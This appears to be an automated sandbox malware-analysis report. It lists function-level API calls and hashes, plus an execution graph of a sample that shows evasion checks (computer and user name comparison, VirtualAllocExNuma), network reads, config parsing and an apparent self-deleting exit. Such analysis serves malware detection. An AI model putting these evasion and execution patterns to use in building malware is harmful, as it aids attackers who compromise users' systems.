                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FC1104E2A15A197EBE1277B99C89C7F296CFE5A3987180424F901E1501FB64CD0185BA
                                                                                                                                                                                                                                                                          Function 0088328F Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • __EH_prolog3.LIBCMT ref: 00883296
                                                                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 008832A0
                                                                                                                                                                                                                                                                            • Part of subcall function 00874360: std::_Lockit::_Lockit.LIBCPMT ref: 0087438E
                                                                                                                                                                                                                                                                            • Part of subcall function 00874360: std::_Lockit::~_Lockit.LIBCPMT ref: 008743B9
                                                                                                                                                                                                                                                                          • codecvt.LIBCPMT ref: 008832DA
                                                                                                                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00883311
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2049136305.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049111683.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049163158.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049180361.00000000008AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049198267.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049213513.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049240462.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3codecvt
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3716348337-0
                                                                                                                                                                                                                                                                          • Opcode ID: a41d8a334b7c6957b718284f2bf915646577035a121bc478aee3655e80ecf3c0
                                                                                                                                                                                                                                                                          • Instruction ID: 974a46d113229fca1503357f56c42475d1e5cf1765ec2ce04350511d217e4a18
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a41d8a334b7c6957b718284f2bf915646577035a121bc478aee3655e80ecf3c0
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BF01AD32A002198BDB05BBA8E815AAE77B5FF91B10F140409F406EB391DF70DE01CB92
                                                                                                                                                                                                                                                                          Function 0089F0B0 Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • WriteConsoleW.KERNEL32(00000000,?,?,00000000,00000000,?,0089E59F,00000000,00000001,?,?,?,00898758,?,00000000,00000000), ref: 0089F0C7
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,0089E59F,00000000,00000001,?,?,?,00898758,?,00000000,00000000,?,?,?,0089809E,?), ref: 0089F0D3
                                                                                                                                                                                                                                                                            • Part of subcall function 0089F124: CloseHandle.KERNEL32(FFFFFFFE,0089F0E3,?,0089E59F,00000000,00000001,?,?,?,00898758,?,00000000,00000000,?,?), ref: 0089F134
                                                                                                                                                                                                                                                                          • ___initconout.LIBCMT ref: 0089F0E3
                                                                                                                                                                                                                                                                            • Part of subcall function 0089F105: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0089F0A1,0089E58C,?,?,00898758,?,00000000,00000000,?), ref: 0089F118
                                                                                                                                                                                                                                                                          • WriteConsoleW.KERNEL32(00000000,?,?,00000000,?,0089E59F,00000000,00000001,?,?,?,00898758,?,00000000,00000000,?), ref: 0089F0F8
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2049136305.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049111683.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049163158.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049180361.00000000008AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049198267.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049213513.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049240462.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2744216297-0
                                                                                                                                                                                                                                                                          • Opcode ID: 5696daa3f2db41ee5a5dddea7522a52efbcdc4270e40ae0c73b0876dc8266703
                                                                                                                                                                                                                                                                          • Instruction ID: eb1acd2c65c42a3bb37e68b3e64d5b3fb26ca61da44227b472ee3c1f129a7265
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5696daa3f2db41ee5a5dddea7522a52efbcdc4270e40ae0c73b0876dc8266703
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CDF0AC36500125BBDF262FD5DC089993F66FF493A1B094420FB19D5531E7328820DBD5
                                                                                                                                                                                                                                                                          Function 00884C10 Relevance: 6.0, APIs: 4, Instructions: 25timethreadCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00884C22
                                                                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00884C31
                                                                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 00884C3A
                                                                                                                                                                                                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 00884C47
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2049136305.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049111683.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049163158.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049180361.00000000008AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049198267.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049213513.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049240462.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2933794660-0
                                                                                                                                                                                                                                                                          • Opcode ID: d915283fc15a07c773fd22d9284ef662635aa3559e6cdca3190c7d95302b16ef
                                                                                                                                                                                                                                                                          • Instruction ID: fcadc8af5ba60e6c171950d35243c719d1267b673abbd06dbcf73fbb619925f7
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d915283fc15a07c773fd22d9284ef662635aa3559e6cdca3190c7d95302b16ef
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3EF0AF30C0020CEBCB04DBF4C94999EBBF4FF1D200B914995A412E7910E730AA44DF51
                                                                                                                                                                                                                                                                          Function 00877D50 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 477COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2049136305.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049111683.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049163158.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049180361.00000000008AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049198267.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049213513.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049240462.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _strcspn
                                                                                                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                                                                                                          • API String ID: 3709121408-2766056989
                                                                                                                                                                                                                                                                          • Opcode ID: c4c5bca2339f04b39507eb1c2f6a15cb8c88305af3fe3914bf8b4cf69a7c38d8
                                                                                                                                                                                                                                                                          • Instruction ID: b452455db2e0b8ffe328b497ac1c81f7273d8e7aec0bca7ab0408f2e635428c4
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c4c5bca2339f04b39507eb1c2f6a15cb8c88305af3fe3914bf8b4cf69a7c38d8
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DC32B4B4904669CFCB24DF68C981A9DBBF1FF49300F05859AE84DA7305E734AA85CF52
                                                                                                                                                                                                                                                                          Function 00894D72 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 191COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 00890713: GetLastError.KERNEL32(00000000,?,00892A49), ref: 00890717
                                                                                                                                                                                                                                                                            • Part of subcall function 00890713: SetLastError.KERNEL32(00000000,?,?,00000028,0088D2C9), ref: 008907B9
                                                                                                                                                                                                                                                                          • GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,0088AB4D,?,?,?,00000055,?,-00000050,?,?,?), ref: 00894E31
                                                                                                                                                                                                                                                                          • IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,0088AB4D,?,?,?,00000055,?,-00000050,?,?), ref: 00894E68
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2049136305.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049111683.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049163158.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049180361.00000000008AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049198267.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049213513.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049240462.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorLast$CodePageValid
                                                                                                                                                                                                                                                                          • String ID: utf8
                                                                                                                                                                                                                                                                          • API String ID: 943130320-905460609
                                                                                                                                                                                                                                                                          • Opcode ID: 08e78ecdc2270436373ee77c4e0c93795d798103257eaae58be8d4784bb64f9d
                                                                                                                                                                                                                                                                          • Instruction ID: 5dd24f579d8ddd01f8c23725cc6ef84124d3a5f1c9e2b7a9a6a1f77d2f6b6bf2
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 08e78ecdc2270436373ee77c4e0c93795d798103257eaae58be8d4784bb64f9d
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2E51F631A04306AAEF25BB78CC46FAA73A8FF49710F1C6429F515D7181FB70E9428766
                                                                                                                                                                                                                                                                          Function 0088FF48 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 114COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,0088FE49,?,?,00000000,00000000,00000000,?), ref: 0088FF6D
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2049136305.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049111683.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049163158.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049180361.00000000008AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049198267.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049213513.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049240462.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: EncodePointer
                                                                                                                                                                                                                                                                          • String ID: MOC$RCC
                                                                                                                                                                                                                                                                          • API String ID: 2118026453-2084237596
                                                                                                                                                                                                                                                                          • Opcode ID: 2ea20f0927d4791bf2e78e2cd171193030b379965adb0a24e2b5f7d97079e9f2
                                                                                                                                                                                                                                                                          • Instruction ID: 7cf0b2a250dc46fc7f9017e4dc8d519d243b01b8f50c70b7499270a41e48d9d6
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2ea20f0927d4791bf2e78e2cd171193030b379965adb0a24e2b5f7d97079e9f2
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 18414972900509AFDF16EF98CD81AEEBBB5FF48300F188069FA04A7262D7359990DF51
                                                                                                                                                                                                                                                                          Function 0088F7B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 97COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 0088FA2B
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2049136305.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049111683.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049163158.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049180361.00000000008AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049198267.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049213513.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049240462.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ___except_validate_context_record
                                                                                                                                                                                                                                                                          • String ID: csm$csm
                                                                                                                                                                                                                                                                          • API String ID: 3493665558-3733052814
                                                                                                                                                                                                                                                                          • Opcode ID: c669e1417f81cf9df9e165520913f6f6e087970e66c0adf4dafb2b93cde3a989
                                                                                                                                                                                                                                                                          • Instruction ID: 21904da85d1ad83a8dd8e7b3242ed5dd6ea30c28a4891051c14d947a216f9881
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c669e1417f81cf9df9e165520913f6f6e087970e66c0adf4dafb2b93cde3a989
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8B31C4725002189BCF26AF54DC549AA7B65FF08339B18817AFE58CA123D332DDA1DB91
                                                                                                                                                                                                                                                                          Function 00881F82 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 0088200A
                                                                                                                                                                                                                                                                          • RaiseException.KERNEL32(?,?,?,?), ref: 0088202F
                                                                                                                                                                                                                                                                            • Part of subcall function 00884D23: RaiseException.KERNEL32(E06D7363,00000001,00000003,00883ADE,?,?,?,?,00883ADE,00001000,008AAE2C,00001000), ref: 00884D84
                                                                                                                                                                                                                                                                            • Part of subcall function 0088D2B9: IsProcessorFeaturePresent.KERNEL32(00000017,00887E7B,?,?,?,?,00000000), ref: 0088D2D5
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2049136305.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049111683.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049163158.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049180361.00000000008AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049198267.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049213513.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049240462.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ExceptionRaise$FeaturePresentProcessor__alloca_probe_16
                                                                                                                                                                                                                                                                          • String ID: csm
                                                                                                                                                                                                                                                                          • API String ID: 1924019822-1018135373
                                                                                                                                                                                                                                                                          • Opcode ID: c0f1d6b6543db55d6d1f8ba014990c0fc93c46d683ee17577ac8a22f3d9e6883
                                                                                                                                                                                                                                                                          • Instruction ID: 3cb77693833fb619a2a17be42c0b627e4dc5bac98b4e41ad941ab1b9e97bc65e
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c0f1d6b6543db55d6d1f8ba014990c0fc93c46d683ee17577ac8a22f3d9e6883
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7C219F32D006189BCF25FF98D9859AEB7B9FF14714F14440AEA05EF250DB34AE45CB81

                                                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                                                          Execution Coverage:32%
                                                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                          Signature Coverage:7.6%
                                                                                                                                                                                                                                                                          Total number of Nodes:1651
                                                                                                                                                                                                                                                                          Total number of Limit Nodes:17
                                                                                                                                                                                                                                                                          execution_graph 13097 4185c0 13098 4185c2 13097->13098 13111 418610 GetModuleHandleA 13098->13111 13100 4185c9 13115 401090 15 API calls 13100->13115 13106 4185e7 13130 4011f0 GetPEB 13106->13130 13110 418605 13114 418628 13111->13114 13112 418811 LoadLibraryA 13113 418831 13112->13113 13113->13100 13114->13112 13231 4108e0 GetProcessHeap HeapAlloc GetComputerNameA 13115->13231 13117 401135 strcmp 13118 401143 13117->13118 13119 401156 13117->13119 13232 4108b0 GetProcessHeap HeapAlloc GetUserNameA 13118->13232 13123 401000 GetCurrentProcess VirtualAllocExNuma 13119->13123 13121 401148 strcmp 13121->13119 13122 401160 ExitProcess 13121->13122 13124 401087 ExitProcess 13123->13124 13125 40102f VirtualAlloc 13123->13125 13126 40104b 13125->13126 13127 401083 13126->13127 13128 401058 memset VirtualFree 13126->13128 13129 401170 GetPEB 13127->13129 13128->13127 13129->13106 13131 401210 13130->13131 13132 401216 lstrcmpiW 13131->13132 13133 401229 GetPEB 13131->13133 13132->13131 13137 401224 13132->13137 13134 401240 13133->13134 13135 401246 lstrcmpiW 13134->13135 13136 401259 GetPEB 13134->13136 13135->13134 13135->13137 13138 401270 13136->13138 13159 417270 13137->13159 13139 401276 lstrcmpiW 13138->13139 13140 401289 GetPEB 13138->13140 13139->13137 13139->13138 13141 4012a0 13140->13141 13142 4012a6 lstrcmpiW 13141->13142 13143 4012b9 GetPEB 13141->13143 13142->13137 13142->13141 13144 4012d0 13143->13144 13145 4012e6 GetPEB 13144->13145 13146 4012d6 lstrcmpiW 13144->13146 13147 401300 13145->13147 13146->13137 13146->13144 13148 401316 13147->13148 13149 401306 lstrcmpiW 13147->13149 13233 4011b0 GetPEB 13148->13233 13149->13137 13149->13147 13152 4011b0 2 API calls 13153 40132e 13152->13153 13153->13137 13154 4011b0 2 API calls 13153->13154 13155 40133c 13154->13155 13155->13137 13156 4011b0 2 API calls 13155->13156 13157 40134a 13156->13157 13157->13137 13158 4011b0 2 API calls 13157->13158 13158->13137 13160 417280 13159->13160 13237 4108b0 GetProcessHeap HeapAlloc GetUserNameA 13160->13237 13162 4172aa 13238 4188e0 13162->13238 13166 417546 13167 4175aa CreateDirectoryA 13166->13167 13168 4175c6 13167->13168 13248 416b40 13168->13248 13170 417619 13258 410540 13170->13258 13172 4176e0 13268 402aa0 13172->13268 13174 4176f3 13281 4132f0 13174->13281 13176 417700 13287 403920 13176->13287 13178 417786 13308 412d50 13178->13308 13180 4177a0 13181 403920 12 API calls 13180->13181 13182 417816 13181->13182 13321 412a90 13182->13321 13184 417830 13185 403920 12 API calls 13184->13185 13186 4178a6 13185->13186 13337 412c40 13186->13337 13188 4178c0 13343 413510 13188->13343 13190 417920 13379 40e440 13190->13379 13192 417c0b lstrlenA 13196 417c33 13192->13196 13193 4179b8 13194 417a58 13193->13194 13195 403920 12 API calls 13193->13195 13194->13192 13199 403920 12 API calls 13194->13199 13197 417a3c 13195->13197 13198 403920 12 API calls 13196->13198 13200 412e50 strtok_s strtok_s strtok_s strtok_s 13197->13200 13201 417c8e 13198->13201 13202 417b61 13199->13202 13200->13194 13203 412f60 strtok_s strtok_s strtok_s 13201->13203 13204 412980 7 API calls 13202->13204 13208 417ca8 13203->13208 13205 417b7b 13204->13205 13205->13192 13206 417f28 13207 417f30 Sleep 13206->13207 13214 417f44 13206->13214 13207->13206 13209 417df8 13208->13209 13210 416fc0 151 API calls 13208->13210 13211 415bf0 122 API calls 13209->13211 13212 417e5e 13209->13212 13218 417d9b 13210->13218 13211->13212 13212->13206 13213 4166a0 memset memset memset 13212->13213 13213->13206 13215 417fae 13214->13215 13216 411760 18 API calls 13214->13216 13217 41804d 13215->13217 13220 403920 12 API calls 13215->13220 13216->13215 13219 403920 12 API calls 13217->13219 13222 414fe0 117 API calls 13218->13222 13224 418154 13219->13224 13221 418033 13220->13221 13223 412980 7 API calls 13221->13223 13222->13209 13223->13217 13225 411f50 SHFileOperationA 13224->13225 13226 41816f 13225->13226 13227 4170d0 14 API calls 13226->13227 13228 418174 13227->13228 13229 418400 memset ShellExecuteEx memset ExitProcess 13228->13229 13230 4181d9 13229->13230 13230->13110 13231->13117 13232->13121 13234 4011d0 13233->13234 13235 4011e0 13234->13235 13236 4011d6 lstrcmpiW 13234->13236 13235->13137 13235->13152 13236->13234 13236->13235 13237->13162 13239 418d02 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 13238->13239 13243 4188ed 13238->13243 13240 418d4d LoadLibraryA LoadLibraryA LoadLibraryA 13239->13240 13242 417538 13240->13242 13244 4113b0 13242->13244 13243->13239 13247 4113c7 13244->13247 13245 41143d lstrlenA 13245->13247 13246 411462 13246->13166 13247->13245 13247->13246 13254 416b59 13248->13254 13249 416c63 lstrlenA 13249->13254 13250 416c7c strstr 13251 416c8e strstr 13250->13251 13250->13254 13251->13254 13252 416b40 9 API calls 13256 416e32 13252->13256 13254->13249 13254->13250 13257 416d6e 13254->13257 13393 416910 13254->13393 13397 4169c0 13254->13397 13256->13170 13257->13252 13257->13256 13259 410562 GetVolumeInformationA 13258->13259 13261 4105ba 13259->13261 13262 410625 13261->13262 13263 4106d6 13261->13263 13423 410700 GetCurrentHwProfileA 13262->13423 13263->13172 13265 410671 13430 411e60 malloc strncpy 13265->13430 13267 4106a3 13267->13263 13269 402ac9 13268->13269 13270 402790 4 API calls 13269->13270 13271 402ad6 13270->13271 13272 4113b0 lstrlenA 13271->13272 13273 402ff2 13271->13273 13274 402b65 13272->13274 13273->13174 13274->13273 13275 402f32 Sleep 13274->13275 13276 402f73 InternetReadFile 13274->13276 13277 402f43 13275->13277 13279 402f50 13275->13279 13278 402fe1 InternetCloseHandle 13276->13278 13280 402f90 13276->13280 13277->13274 13277->13279 13278->13273 13279->13273 13280->13278 13282 41330f 13281->13282 13283 41332a strtok_s 13282->13283 13284 4134f6 13283->13284 13286 413345 13283->13286 13284->13176 13285 413360 strtok_s 13285->13284 13285->13286 13286->13285 13288 403949 13287->13288 13289 402790 4 API calls 13288->13289 13290 403956 13289->13290 13291 4113b0 lstrlenA 13290->13291 13292 404006 13290->13292 13295 4039e4 13291->13295 13432 407790 lstrlenA 13292->13432 13294 403f35 13294->13178 13295->13292 13295->13294 13296 403e68 memcpy 13295->13296 13297 403e81 13296->13297 13298 403ea6 memcpy 13297->13298 13299 403ec0 13298->13299 13300 403ef6 Sleep 13299->13300 13302 403f62 13299->13302 13301 403f0b 13300->13301 13303 403f10 13300->13303 13301->13299 13301->13303 13304 403f80 InternetReadFile 13302->13304 13303->13294 13303->13304 13305 403ff7 InternetCloseHandle 13304->13305 13306 403f9d 13304->13306 13305->13292 13306->13305 13307 403fd9 InternetReadFile 13306->13307 13307->13305 13307->13306 13434 410530 13308->13434 13310 412d69 strtok_s 13312 412d84 13310->13312 13313 412e3e 13310->13313 13311 412db0 strtok_s 13311->13312 13311->13313 13312->13311 13312->13313 13320 412fca 13312->13320 13313->13180 13314 412ec0 strtok_s 13313->13314 13313->13320 13314->13313 13316 412f4d 13314->13316 13315 413010 strtok_s 13319 4132d3 13315->13319 13315->13320 13316->13180 13317 413360 strtok_s 13318 4134f6 13317->13318 13317->13319 13318->13180 13319->13180 13319->13317 13320->13315 13320->13319 13435 410530 13321->13435 13323 412aa9 strtok_s 13324 412c24 13323->13324 13327 412ac4 13323->13327 13324->13184 13325 412b00 strtok_s 13325->13324 13325->13327 13326 412d8b 13328 412db0 strtok_s 13326->13328 13331 412e3e 13326->13331 13336 412fca 13326->13336 13327->13325 13327->13326 